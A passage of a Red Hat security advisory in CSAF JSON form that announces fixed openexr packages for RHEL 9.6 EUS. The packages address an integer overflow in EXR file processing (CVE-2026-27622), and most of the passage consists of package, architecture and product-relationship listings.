"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
}
]
}
RHSA-2026:8872
Vulnerability from csaf_redhat - Published: 2026-04-20 04:01 - Updated: 2026-05-14 22:36A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for openexr is now available for Red Hat Enterprise Linux 9.6 Extended Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenEXR is an open-source high-dynamic-range floating-point image file format for high-quality image processing and storage. This document presents a brief overview of OpenEXR and explains concepts that are specific to this format. This package containes the binaries for OpenEXR.\n\nSecurity Fix(es):\n\n* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:8872",
"url": "https://access.redhat.com/errata/RHSA-2026:8872"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_8872.json"
}
],
"title": "Red Hat Security Advisory: openexr security update",
"tracking": {
"current_release_date": "2026-05-14T22:36:31+00:00",
"generator": {
"date": "2026-05-14T22:36:31+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:8872",
"initial_release_date": "2026-04-20T04:01:45+00:00",
"revision_history": [
{
"date": "2026-04-20T04:01:45+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-20T04:01:45+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-14T22:36:31+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product": {
"name": "Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_eus:9.6::appstream"
}
}
},
{
"category": "product_name",
"name": "Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product": {
"name": "Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_eus:9.6::crb"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-3.el9_6.1.src",
"product": {
"name": "openexr-0:3.1.1-3.el9_6.1.src",
"product_id": "openexr-0:3.1.1-3.el9_6.1.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-3.el9_6.1?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-3.el9_6.1.aarch64",
"product": {
"name": "openexr-0:3.1.1-3.el9_6.1.aarch64",
"product_id": "openexr-0:3.1.1-3.el9_6.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-3.el9_6.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-3.el9_6.1.aarch64",
"product": {
"name": "openexr-libs-0:3.1.1-3.el9_6.1.aarch64",
"product_id": "openexr-libs-0:3.1.1-3.el9_6.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-3.el9_6.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64",
"product": {
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64",
"product_id": "openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-3.el9_6.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"product": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"product_id": "openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-3.el9_6.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"product_id": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-3.el9_6.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.1-3.el9_6.1.aarch64",
"product": {
"name": "openexr-devel-0:3.1.1-3.el9_6.1.aarch64",
"product_id": "openexr-devel-0:3.1.1-3.el9_6.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.1-3.el9_6.1?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-3.el9_6.1.ppc64le",
"product": {
"name": "openexr-0:3.1.1-3.el9_6.1.ppc64le",
"product_id": "openexr-0:3.1.1-3.el9_6.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-3.el9_6.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-3.el9_6.1.ppc64le",
"product": {
"name": "openexr-libs-0:3.1.1-3.el9_6.1.ppc64le",
"product_id": "openexr-libs-0:3.1.1-3.el9_6.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-3.el9_6.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le",
"product": {
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le",
"product_id": "openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-3.el9_6.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"product": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"product_id": "openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-3.el9_6.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"product_id": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-3.el9_6.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.1-3.el9_6.1.ppc64le",
"product": {
"name": "openexr-devel-0:3.1.1-3.el9_6.1.ppc64le",
"product_id": "openexr-devel-0:3.1.1-3.el9_6.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.1-3.el9_6.1?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-3.el9_6.1.x86_64",
"product": {
"name": "openexr-0:3.1.1-3.el9_6.1.x86_64",
"product_id": "openexr-0:3.1.1-3.el9_6.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-3.el9_6.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-3.el9_6.1.x86_64",
"product": {
"name": "openexr-libs-0:3.1.1-3.el9_6.1.x86_64",
"product_id": "openexr-libs-0:3.1.1-3.el9_6.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-3.el9_6.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64",
"product": {
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64",
"product_id": "openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-3.el9_6.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"product": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"product_id": "openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-3.el9_6.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"product_id": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-3.el9_6.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.1-3.el9_6.1.x86_64",
"product": {
"name": "openexr-devel-0:3.1.1-3.el9_6.1.x86_64",
"product_id": "openexr-devel-0:3.1.1-3.el9_6.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.1-3.el9_6.1?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-3.el9_6.1.i686",
"product": {
"name": "openexr-libs-0:3.1.1-3.el9_6.1.i686",
"product_id": "openexr-libs-0:3.1.1-3.el9_6.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-3.el9_6.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.i686",
"product": {
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.i686",
"product_id": "openexr-debugsource-0:3.1.1-3.el9_6.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-3.el9_6.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.i686",
"product": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.i686",
"product_id": "openexr-debuginfo-0:3.1.1-3.el9_6.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-3.el9_6.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686",
"product_id": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-3.el9_6.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.1-3.el9_6.1.i686",
"product": {
"name": "openexr-devel-0:3.1.1-3.el9_6.1.i686",
"product_id": "openexr-devel-0:3.1.1-3.el9_6.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.1-3.el9_6.1?arch=i686"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-3.el9_6.1.s390x",
"product": {
"name": "openexr-0:3.1.1-3.el9_6.1.s390x",
"product_id": "openexr-0:3.1.1-3.el9_6.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-3.el9_6.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-3.el9_6.1.s390x",
"product": {
"name": "openexr-libs-0:3.1.1-3.el9_6.1.s390x",
"product_id": "openexr-libs-0:3.1.1-3.el9_6.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-3.el9_6.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.s390x",
"product": {
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.s390x",
"product_id": "openexr-debugsource-0:3.1.1-3.el9_6.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-3.el9_6.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"product": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"product_id": "openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-3.el9_6.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"product_id": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-3.el9_6.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.1-3.el9_6.1.s390x",
"product": {
"name": "openexr-devel-0:3.1.1-3.el9_6.1.s390x",
"product_id": "openexr-devel-0:3.1.1-3.el9_6.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.1-3.el9_6.1?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_6.1.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.aarch64"
},
"product_reference": "openexr-0:3.1.1-3.el9_6.1.aarch64",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_6.1.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.ppc64le"
},
"product_reference": "openexr-0:3.1.1-3.el9_6.1.ppc64le",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_6.1.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.s390x"
},
"product_reference": "openexr-0:3.1.1-3.el9_6.1.s390x",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_6.1.src as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.src"
},
"product_reference": "openexr-0:3.1.1-3.el9_6.1.src",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.x86_64"
},
"product_reference": "openexr-0:3.1.1-3.el9_6.1.x86_64",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
